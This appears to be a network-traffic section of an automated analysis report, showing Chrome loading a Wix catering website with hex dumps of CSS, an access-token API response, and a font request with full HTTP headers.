                                                                                                                                                                                                                        2025-01-10 13:52:35 UTC1531INData Raw: 74 79 70 65 3a 69 6e 6c 69 6e 65 2d 73 69 7a 65 29 7b 3a 72 6f 6f 74 7b 2d 2d 6f 6e 65 2d 75 6e 69 74 3a 31 63 71 77 7d 7d 5b 69 64 5e 3d 6f 6c 64 48 6f 76 65 72 42 6f 78 2d 5d 7b 6d 69 78 2d 62 6c 65 6e 64 2d 6d 6f 64 65 3a 70 6c 75 73 2d 6c 69 67 68 74 65 72 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 6f 70 61 63 69 74 79 20 2e 35 73 20 65 61 73 65 2c 76 69 73 69 62 69 6c 69 74 79 20 2e 35 73 20 65 61 73 65 7d 5b 64 61 74 61 2d 6d 65 73 68 2d 69 64 24 3d 69 6e 6c 69 6e 65 43 6f 6e 74 65 6e 74 2d 67 72 69 64 43 6f 6e 74 61 69 6e 65 72 5d 3a 68 61 73 28 3e 5b 69 64 5e 3d 6f 6c 64 48 6f 76 65 72 42 6f 78 2d 5d 29 7b 69 73 6f 6c 61 74 69 6f 6e 3a 69 73 6f 6c 61 74 65 7d 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 64 61 74 61 2d 75 72 6c 3d 22 68 74 74 70 73 3a
                                                                                                                                                                                                                        Data Ascii: type:inline-size){:root{--one-unit:1cqw}}[id^=oldHoverBox-]{mix-blend-mode:plus-lighter;transition:opacity .5s ease,visibility .5s ease}[data-mesh-id$=inlineContent-gridContainer]:has(>[id^=oldHoverBox-]){isolation:isolate}</style><style data-url="https:
                                                                                                                                                                                                                        2025-01-10 13:52:35 UTC1531INData Raw: 69 6c 65 2d 6f 70 74 69 6d 69 7a 65 64 3a 6e 6f 74 28 2e 72 65 73 70 6f 6e 73 69 76 65 29 3a 6e 6f 74 28 2e 62 6c 6f 63 6b 53 69 74 65 53 63 72 6f 6c 6c 69 6e 67 29 20 23 53 49 54 45 5f 43 4f 4e 54 41 49 4e 45 52 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 7d 62 6f 64 79 2e 64 65 76 69 63 65 2d 6d 6f 62 69 6c 65 2d 6f 70 74 69 6d 69 7a 65 64 3e 2a 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 7d 62 6f 64 79 2e 64 65 76 69 63 65 2d 6d 6f 62 69 6c 65 2d 6f 70 74 69 6d 69 7a 65 64 20 23 73 69 74 65 2d 72 6f 6f 74 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 3b 6f 76 65 72 66 6c 6f 77 2d 79 3a 68 69 64 64 65 6e 7d 40 73 75 70 70 6f 72 74 73 28 6f 76 65 72 66 6c 6f 77 3a 63 6c 69 70 29 7b 62 6f 64 79 2e 64 65 76 69 63 65 2d 6d
                                                                                                                                                                                                                        Data Ascii: ile-optimized:not(.responsive):not(.blockSiteScrolling) #SITE_CONTAINER{margin-top:0}body.device-mobile-optimized>*{max-width:100%!important}body.device-mobile-optimized #site-root{overflow-x:hidden;overflow-y:hidden}@supports(overflow:clip){body.device-m
                                                                                                                                                                                                                        2025-01-10 13:52:35 UTC1531INData Raw: 74 61 6e 74 7d 62 6f 64 79 2e 62 6c 6f 63 6b 53 69 74 65 53 63 72 6f 6c 6c 69 6e 67 2c 62 6f 64 79 2e 73 69 74 65 53 63 72 6f 6c 6c 69 6e 67 42 6c 6f 63 6b 65 64 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 77 69 64 74 68 3a 31 30 30 25 7d 62 6f 64 79 2e 62 6c 6f 63 6b 53 69 74 65 53 63 72 6f 6c 6c 69 6e 67 20 23 53 49 54 45 5f 43 4f 4e 54 41 49 4e 45 52 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 63 61 6c 63 28 76 61 72 28 2d 2d 62 6c 6f 63 6b 65 64 2d 73 69 74 65 2d 73 63 72 6f 6c 6c 2d 6d 61 72 67 69 6e 2d 74 6f 70 29 2a 2d 31 29 7d 62 6f 64 79 2e 62 6c 6f 63 6b 53 69 74 65 53 63 72 6f 6c 6c 69 6e 67 3a 6e 6f 74 28 2e 72 65 73 70 6f 6e 73 69 76 65 29 20 23 57 49 58 5f 41 44 53 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 76 61 72 28 2d 2d 62 6c 6f 63 6b 65 64 2d 73
                                                                                                                                                                                                                        Data Ascii: tant}body.blockSiteScrolling,body.siteScrollingBlocked{position:fixed;width:100%}body.blockSiteScrolling #SITE_CONTAINER{margin-top:calc(var(--blocked-site-scroll-margin-top)*-1)}body.blockSiteScrolling:not(.responsive) #WIX_ADS{margin-top:var(--blocked-s
                                                                                                                                                                                                                        2025-01-10 13:52:35 UTC843INData Raw: 65 2d 72 6f 77 73 3a 6d 61 78 2d 63 6f 6e 74 65 6e 74 20 6d 61 78 2d 63 6f 6e 74 65 6e 74 20 6d 69 6e 2d 63 6f 6e 74 65 6e 74 20 6d 61 78 2d 63 6f 6e 74 65 6e 74 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 74 72 65 74 63 68 7d 23 6d 61 73 74 65 72 50 61 67 65 2e 6d 65 73 68 2d 6c 61 79 6f 75 74 20 23 50 41 47 45 53 5f 43 4f 4e 54 41 49 4e 45 52 2c 23 6d 61 73 74 65 72 50 61 67 65 2e 6d 65 73 68 2d 6c 61 79 6f 75 74 20 23 53 49 54 45 5f 46 4f 4f 54 45 52 2d 70 6c 61 63 65 68 6f 6c 64 65 72 2c 23 6d 61 73 74 65 72 50 61 67 65 2e 6d 65 73 68 2d 6c 61 79 6f 75 74 20 23 53 49 54 45 5f 46 4f 4f 54 45 52 5f 57 52 41 50 50 45 52 2c 23 6d 61 73 74 65 72 50 61 67 65 2e 6d 65 73 68 2d 6c 61 79 6f 75 74 20 23 53 49 54 45 5f 48 45 41 44 45 52 2d 70 6c 61 63
                                                                                                                                                                                                                        Data Ascii: e-rows:max-content max-content min-content max-content;justify-content:stretch}#masterPage.mesh-layout #PAGES_CONTAINER,#masterPage.mesh-layout #SITE_FOOTER-placeholder,#masterPage.mesh-layout #SITE_FOOTER_WRAPPER,#masterPage.mesh-layout #SITE_HEADER-plac


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        2192.168.2.54972234.149.87.454435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC631OUTGET /_api/v1/access-tokens HTTP/1.1
                                                                                                                                                                                                                        Host: www.samantacatering.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Cookie: ssr-caching=cache#desc=hit#varnish=hit_miss#dc#desc=fastly_virginia-pub_g
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC1654INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 13300
                                                                                                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        Strict-Transport-Security: max-age=86400
                                                                                                                                                                                                                        Age: 15877
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        X-Wix-Request-Id: 1736517156.3561093215496211205847
                                                                                                                                                                                                                        Set-Cookie: XSRF-TOKEN=1736517156|zNWYyaBL2sXn; Path=/; Domain=www.samantacatering.com; Secure; SameSite=None
                                                                                                                                                                                                                        Set-Cookie: hs=441353572; Path=/; Domain=www.samantacatering.com; Secure; HTTPOnly
                                                                                                                                                                                                                        Set-Cookie: svSession=2a930e69c94ce92e7473fb7588b1b8619ec94ae447207b1a769369bd5d3b0b43431f61ddbd00e3be42d66bae2b8a582e1e60994d53964e647acf431e4f798bcd4304a4d4d509042ad582d375075a884390396b31efeb64a472005d70c04e92b55797c1d6d99734f7952db21e644cd88b62a7ec3fed30c8eea5c1a3a42c574873a0b62283d958be7e075929b5797ae2c5; Max-Age=63071999; Expires=Sun, 10 Jan 2027 13:52:35 GMT; Path=/; Domain=www.samantacatering.com; Secure; HTTPOnly; SameSite=None
                                                                                                                                                                                                                        Cache-Control: private,no-cache,no-store
                                                                                                                                                                                                                        Server: Pepyaka
                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 13:52:36 GMT
                                                                                                                                                                                                                        X-Served-By: cache-iad-kcgs7200166-IAD
                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        Server-Timing: cache;desc=hit, varnish;desc=hit_miss, dc;desc=fastly_virginia-pub_g
                                                                                                                                                                                                                        X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,oDbbMvfdXCdtsgjD2KgaM8iHE4dbw+wewoJ5nvKoyjE=,m0j2EEknGIVUW/liY8BLLltYFHcExLHASBr6P6HkNiQtFZnRrnvyqOEKpetNb+u3,2d58ifebGbosy5xc+FRalnUY0i85DoeIuxXrg/OeKEk0ZnzgeKxEe+i15ZVKY+NmgSxo6X0nVHoigjSDU7A9+1iB5QmpRe2J37zq9nDD6cs=,2UNV7KOq4oGjA5+PKsX47EHaMG9J8M6uqdkXcNn1Z84xwy5Yb789UDkEfaJNWrtQ
                                                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                                                        glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC1654INData Raw: 7b 22 68 73 22 3a 34 34 31 33 35 33 35 37 32 2c 22 76 69 73 69 74 6f 72 49 64 22 3a 22 38 64 36 34 39 33 33 37 2d 38 39 63 64 2d 34 38 64 34 2d 39 39 33 39 2d 31 37 64 31 65 30 38 32 39 38 38 34 22 2c 22 73 76 53 65 73 73 69 6f 6e 22 3a 22 32 61 39 33 30 65 36 39 63 39 34 63 65 39 32 65 37 34 37 33 66 62 37 35 38 38 62 31 62 38 36 31 39 65 63 39 34 61 65 34 34 37 32 30 37 62 31 61 37 36 39 33 36 39 62 64 35 64 33 62 30 62 34 33 34 33 31 66 36 31 64 64 62 64 30 30 65 33 62 65 34 32 64 36 36 62 61 65 32 62 38 61 35 38 32 65 31 65 36 30 39 39 34 64 35 33 39 36 34 65 36 34 37 61 63 66 34 33 31 65 34 66 37 39 38 62 63 64 34 33 30 34 61 34 64 34 64 35 30 39 30 34 32 61 64 35 38 32 64 33 37 35 30 37 35 61 38 38 34 33 39 30 33 39 36 62 33 31 65 66 65 62 36 34 61
                                                                                                                                                                                                                        Data Ascii: {"hs":441353572,"visitorId":"8d649337-89cd-48d4-9939-17d1e0829884","svSession":"2a930e69c94ce92e7473fb7588b1b8619ec94ae447207b1a769369bd5d3b0b43431f61ddbd00e3be42d66bae2b8a582e1e60994d53964e647acf431e4f798bcd4304a4d4d509042ad582d375075a884390396b31efeb64a
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC1654INData Raw: 35 31 31 65 2d 36 38 31 37 2d 63 39 66 30 2d 34 38 39 39 33 61 37 35 34 37 64 31 22 3a 7b 22 69 6e 73 74 61 6e 63 65 22 3a 22 75 71 6c 54 50 30 36 58 38 39 57 61 30 44 44 58 69 70 33 31 76 73 44 72 56 34 49 67 71 45 74 47 44 66 4e 35 77 63 34 45 71 41 63 2e 65 79 4a 70 62 6e 4e 30 59 57 35 6a 5a 55 6c 6b 49 6a 6f 69 4d 32 49 78 59 6d 4d 78 59 6a 45 74 4e 32 52 6c 59 79 30 30 4e 32 55 32 4c 54 67 33 59 54 6b 74 4e 6a 49 33 4e 6a 45 34 59 54 55 34 4d 54 56 6b 49 69 77 69 59 58 42 77 52 47 56 6d 53 57 51 69 4f 69 49 78 4e 44 46 6d 59 6d 5a 68 5a 53 30 31 4d 54 46 6c 4c 54 59 34 4d 54 63 74 59 7a 6c 6d 4d 43 30 30 4f 44 6b 35 4d 32 45 33 4e 54 51 33 5a 44 45 69 4c 43 4a 74 5a 58 52 68 55 32 6c 30 5a 55 6c 6b 49 6a 6f 69 4f 47 5a 6a 4d 54 45 7a 4f 47 4d 74 4e
                                                                                                                                                                                                                        Data Ascii: 511e-6817-c9f0-48993a7547d1":{"instance":"uqlTP06X89Wa0DDXip31vsDrV4IgqEtGDfN5wc4EqAc.eyJpbnN0YW5jZUlkIjoiM2IxYmMxYjEtN2RlYy00N2U2LTg3YTktNjI3NjE4YTU4MTVkIiwiYXBwRGVmSWQiOiIxNDFmYmZhZS01MTFlLTY4MTctYzlmMC00ODk5M2E3NTQ3ZDEiLCJtZXRhU2l0ZUlkIjoiOGZjMTEzOGMtN
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC1654INData Raw: 59 6d 59 30 4e 47 55 69 4c 43 4a 7a 61 58 52 6c 54 33 64 75 5a 58 4a 4a 5a 43 49 36 49 6a 41 78 4e 54 68 69 4e 47 4d 32 4c 54 4e 69 4e 54 63 74 4e 44 5a 69 4e 79 31 68 5a 57 5a 6d 4c 54 64 69 5a 54 4d 7a 4e 6a 55 79 4d 6a 64 6b 4f 53 4a 39 22 2c 22 69 6e 74 49 64 22 3a 31 39 7d 2c 22 33 30 37 62 61 39 33 31 2d 36 38 39 63 2d 34 62 35 35 2d 62 62 31 64 2d 36 61 33 38 32 62 61 64 39 32 32 32 22 3a 7b 22 69 6e 73 74 61 6e 63 65 22 3a 22 52 71 39 74 2d 34 39 6a 79 51 6a 48 47 2d 72 46 65 2d 4e 58 6a 42 76 4e 56 76 58 6c 72 4b 31 32 30 4e 58 34 2d 47 74 49 4a 45 59 2e 65 79 4a 70 62 6e 4e 30 59 57 35 6a 5a 55 6c 6b 49 6a 6f 69 4d 7a 55 30 59 7a 64 69 4d 54 59 74 4d 7a 55 31 4f 43 30 30 4d 6d 55 35 4c 54 6b 32 59 57 51 74 5a 44 52 6a 4e 57 56 69 4d 57 46 6a 4e
                                                                                                                                                                                                                        Data Ascii: YmY0NGUiLCJzaXRlT3duZXJJZCI6IjAxNThiNGM2LTNiNTctNDZiNy1hZWZmLTdiZTMzNjUyMjdkOSJ9","intId":19},"307ba931-689c-4b55-bb1d-6a382bad9222":{"instance":"Rq9t-49jyQjHG-rFe-NXjBvNVvXlrK120NX4-GtIJEY.eyJpbnN0YW5jZUlkIjoiMzU0YzdiMTYtMzU1OC00MmU5LTk2YWQtZDRjNWViMWFjN
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC1654INData Raw: 4e 6a 51 35 4d 7a 4d 33 4c 54 67 35 59 32 51 74 4e 44 68 6b 4e 43 30 35 4f 54 4d 35 4c 54 45 33 5a 44 46 6c 4d 44 67 79 4f 54 67 34 4e 43 49 73 49 6d 4a 70 56 47 39 72 5a 57 34 69 4f 69 49 77 59 6d 49 7a 4d 44 4e 6a 59 69 30 79 59 32 51 35 4c 54 42 69 4f 54 49 74 4d 6d 55 7a 5a 43 30 77 4f 57 4e 69 4e 54 4d 32 4e 6d 55 78 5a 6d 59 69 4c 43 4a 7a 61 58 52 6c 54 33 64 75 5a 58 4a 4a 5a 43 49 36 49 6a 41 78 4e 54 68 69 4e 47 4d 32 4c 54 4e 69 4e 54 63 74 4e 44 5a 69 4e 79 31 68 5a 57 5a 6d 4c 54 64 69 5a 54 4d 7a 4e 6a 55 79 4d 6a 64 6b 4f 53 4a 39 22 2c 22 69 6e 74 49 64 22 3a 32 32 7d 2c 22 35 35 63 64 39 30 33 36 2d 33 36 62 62 2d 34 38 30 62 2d 38 64 64 63 2d 61 66 64 61 33 63 62 32 65 62 38 64 22 3a 7b 22 69 6e 73 74 61 6e 63 65 22 3a 22 62 59 68 59 54
                                                                                                                                                                                                                        Data Ascii: NjQ5MzM3LTg5Y2QtNDhkNC05OTM5LTE3ZDFlMDgyOTg4NCIsImJpVG9rZW4iOiIwYmIzMDNjYi0yY2Q5LTBiOTItMmUzZC0wOWNiNTM2NmUxZmYiLCJzaXRlT3duZXJJZCI6IjAxNThiNGM2LTNiNTctNDZiNy1hZWZmLTdiZTMzNjUyMjdkOSJ9","intId":22},"55cd9036-36bb-480b-8ddc-afda3cb2eb8d":{"instance":"bYhYT
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC1654INData Raw: 5a 44 55 31 4d 57 4d 32 59 32 45 33 4d 57 46 6d 49 69 77 69 63 32 6c 6e 62 6b 52 68 64 47 55 69 4f 69 49 79 4d 44 49 31 4c 54 41 78 4c 54 45 77 56 44 45 7a 4f 6a 55 79 4f 6a 4d 32 4c 6a 4d 33 4d 46 6f 69 4c 43 4a 6b 5a 57 31 76 54 57 39 6b 5a 53 49 36 5a 6d 46 73 63 32 55 73 49 6d 46 70 5a 43 49 36 49 6a 68 6b 4e 6a 51 35 4d 7a 4d 33 4c 54 67 35 59 32 51 74 4e 44 68 6b 4e 43 30 35 4f 54 4d 35 4c 54 45 33 5a 44 46 6c 4d 44 67 79 4f 54 67 34 4e 43 49 73 49 6d 4a 70 56 47 39 72 5a 57 34 69 4f 69 49 77 4e 6a 49 7a 4d 54 42 6d 59 69 30 32 59 54 64 6a 4c 54 41 79 4d 57 51 74 4d 44 63 34 4e 53 31 6c 4f 54 45 35 59 6a 55 34 4f 44 4a 6d 4d 6d 4d 69 4c 43 4a 7a 61 58 52 6c 54 33 64 75 5a 58 4a 4a 5a 43 49 36 49 6a 41 78 4e 54 68 69 4e 47 4d 32 4c 54 4e 69 4e 54 63
                                                                                                                                                                                                                        Data Ascii: ZDU1MWM2Y2E3MWFmIiwic2lnbkRhdGUiOiIyMDI1LTAxLTEwVDEzOjUyOjM2LjM3MFoiLCJkZW1vTW9kZSI6ZmFsc2UsImFpZCI6IjhkNjQ5MzM3LTg5Y2QtNDhkNC05OTM5LTE3ZDFlMDgyOTg4NCIsImJpVG9rZW4iOiIwNjIzMTBmYi02YTdjLTAyMWQtMDc4NS1lOTE5YjU4ODJmMmMiLCJzaXRlT3duZXJJZCI6IjAxNThiNGM2LTNiNTc
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC1654INData Raw: 30 5a 55 6c 6b 49 6a 6f 69 4f 47 5a 6a 4d 54 45 7a 4f 47 4d 74 4e 7a 6c 69 4e 43 30 30 5a 54 49 35 4c 57 4a 69 59 7a 41 74 5a 44 55 31 4d 57 4d 32 59 32 45 33 4d 57 46 6d 49 69 77 69 63 32 6c 6e 62 6b 52 68 64 47 55 69 4f 69 49 79 4d 44 49 31 4c 54 41 78 4c 54 45 77 56 44 45 7a 4f 6a 55 79 4f 6a 4d 32 4c 6a 4d 33 4d 46 6f 69 4c 43 4a 6b 5a 57 31 76 54 57 39 6b 5a 53 49 36 5a 6d 46 73 63 32 55 73 49 6d 46 70 5a 43 49 36 49 6a 68 6b 4e 6a 51 35 4d 7a 4d 33 4c 54 67 35 59 32 51 74 4e 44 68 6b 4e 43 30 35 4f 54 4d 35 4c 54 45 33 5a 44 46 6c 4d 44 67 79 4f 54 67 34 4e 43 49 73 49 6d 4a 70 56 47 39 72 5a 57 34 69 4f 69 49 31 4d 6a 42 6a 4d 47 5a 6a 5a 53 31 69 4e 54 6b 77 4c 54 42 6b 4d 6d 59 74 4d 57 55 32 4f 53 31 6d 4e 6d 4a 68 4e 32 46 6c 4f 47 59 32 4d 7a
                                                                                                                                                                                                                        Data Ascii: 0ZUlkIjoiOGZjMTEzOGMtNzliNC00ZTI5LWJiYzAtZDU1MWM2Y2E3MWFmIiwic2lnbkRhdGUiOiIyMDI1LTAxLTEwVDEzOjUyOjM2LjM3MFoiLCJkZW1vTW9kZSI6ZmFsc2UsImFpZCI6IjhkNjQ5MzM3LTg5Y2QtNDhkNC05OTM5LTE3ZDFlMDgyOTg4NCIsImJpVG9rZW4iOiI1MjBjMGZjZS1iNTkwLTBkMmYtMWU2OS1mNmJhN2FlOGY2Mz
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC1654INData Raw: 6c 4c 54 68 69 5a 54 59 74 4e 44 51 77 59 6d 4d 78 59 6a 6b 31 5a 54 6c 68 49 69 77 69 59 58 42 77 52 47 56 6d 53 57 51 69 4f 69 49 33 5a 57 5a 68 4f 54 6b 7a 4e 69 30 34 4e 6d 59 33 4c 54 51 30 59 7a 59 74 4f 44 67 77 59 69 30 33 59 6d 46 6c 4e 47 55 77 4e 44 52 68 4d 32 51 69 4c 43 4a 74 5a 58 52 68 55 32 6c 30 5a 55 6c 6b 49 6a 6f 69 4f 47 5a 6a 4d 54 45 7a 4f 47 4d 74 4e 7a 6c 69 4e 43 30 30 5a 54 49 35 4c 57 4a 69 59 7a 41 74 5a 44 55 31 4d 57 4d 32 59 32 45 33 4d 57 46 6d 49 69 77 69 63 32 6c 6e 62 6b 52 68 64 47 55 69 4f 69 49 79 4d 44 49 31 4c 54 41 78 4c 54 45 77 56 44 45 7a 4f 6a 55 79 4f 6a 4d 32 4c 6a 4d 33 4d 46 6f 69 4c 43 4a 6b 5a 57 31 76 54 57 39 6b 5a 53 49 36 5a 6d 46 73 63 32 55 73 49 6d 46 70 5a 43 49 36 49 6a 68 6b 4e 6a 51 35 4d 7a
                                                                                                                                                                                                                        Data Ascii: lLThiZTYtNDQwYmMxYjk1ZTlhIiwiYXBwRGVmSWQiOiI3ZWZhOTkzNi04NmY3LTQ0YzYtODgwYi03YmFlNGUwNDRhM2QiLCJtZXRhU2l0ZUlkIjoiOGZjMTEzOGMtNzliNC00ZTI5LWJiYzAtZDU1MWM2Y2E3MWFmIiwic2lnbkRhdGUiOiIyMDI1LTAxLTEwVDEzOjUyOjM2LjM3MFoiLCJkZW1vTW9kZSI6ZmFsc2UsImFpZCI6IjhkNjQ5Mz
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC1654INData Raw: 61 22 3a 7b 22 69 6e 73 74 61 6e 63 65 22 3a 22 78 67 35 71 79 68 66 53 7a 4a 6e 53 52 64 5f 35 56 44 56 49 47 65 47 6b 75 35 48 34 48 5f 51 33 30 4d 54 62 42 33 78 31 4a 35 41 2e 65 79 4a 70 62 6e 4e 30 59 57 35 6a 5a 55 6c 6b 49 6a 6f 69 4f 54 4d 35 4e 6d 4d 78 4e 32 4d 74 4e 6d 56 6b 4d 69 30 30 4f 47 45 7a 4c 57 49 7a 4d 7a 67 74 59 6a 45 31 4e 7a 56 6c 4f 44 4e 6c 4d 44 5a 68 49 69 77 69 59 58 42 77 52 47 56 6d 53 57 51 69 4f 69 49 78 4e 54 42 68 5a 54 64 6c 5a 53 31 6a 4e 7a 52 68 4c 57 56 6c 59 32 51 74 5a 44 4e 6b 4e 79 30 79 4d 54 45 79 4f 44 6b 31 59 6a 6b 34 4f 47 45 69 4c 43 4a 74 5a 58 52 68 55 32 6c 30 5a 55 6c 6b 49 6a 6f 69 4f 47 5a 6a 4d 54 45 7a 4f 47 4d 74 4e 7a 6c 69 4e 43 30 30 5a 54 49 35 4c 57 4a 69 59 7a 41 74 5a 44 55 31 4d 57 4d
                                                                                                                                                                                                                        Data Ascii: a":{"instance":"xg5qyhfSzJnSRd_5VDVIGeGku5H4H_Q30MTbB3x1J5A.eyJpbnN0YW5jZUlkIjoiOTM5NmMxN2MtNmVkMi00OGEzLWIzMzgtYjE1NzVlODNlMDZhIiwiYXBwRGVmSWQiOiIxNTBhZTdlZS1jNzRhLWVlY2QtZDNkNy0yMTEyODk1Yjk4OGEiLCJtZXRhU2l0ZUlkIjoiOGZjMTEzOGMtNzliNC00ZTI5LWJiYzAtZDU1MWM
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC68INData Raw: 49 36 49 6a 41 78 4e 54 68 69 4e 47 4d 32 4c 54 4e 69 4e 54 63 74 4e 44 5a 69 4e 79 31 68 5a 57 5a 6d 4c 54 64 69 5a 54 4d 7a 4e 6a 55 79 4d 6a 64 6b 4f 53 4a 39 22 2c 22 69 6e 74 49 64 22 3a 38 7d 7d 7d
                                                                                                                                                                                                                        Data Ascii: I6IjAxNThiNGM2LTNiNTctNDZiNy1hZWZmLTdiZTMzNjUyMjdkOSJ9","intId":8}}}


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        3192.168.2.54971734.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC668OUTGET /tag-bundler/api/v1/fonts-cache/googlefont/woff2/s/ebgaramond/v12/SlGUmQSNjdsmc35JDF1K5GR1SDk_YAPI.woff2 HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: font
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC948INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 39408
                                                                                                                                                                                                                        X-Envoy-Upstream-Service-Time: 49
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Varnish: 611550177 916314377
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: false
                                                                                                                                                                                                                        X-Varnish: 891182117 893432146
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVcxMNgXS7J8yrt3GwAgEfDyVn+PxHDBkh4V2x50EyEnEQ
                                                                                                                                                                                                                        X-Cluster-Node-Role: serve
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Date: Wed, 25 Dec 2024 17:05:45 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000
                                                                                                                                                                                                                        Age: 1370811
                                                                                                                                                                                                                        Content-Type: font/woff2
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-12baf686
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
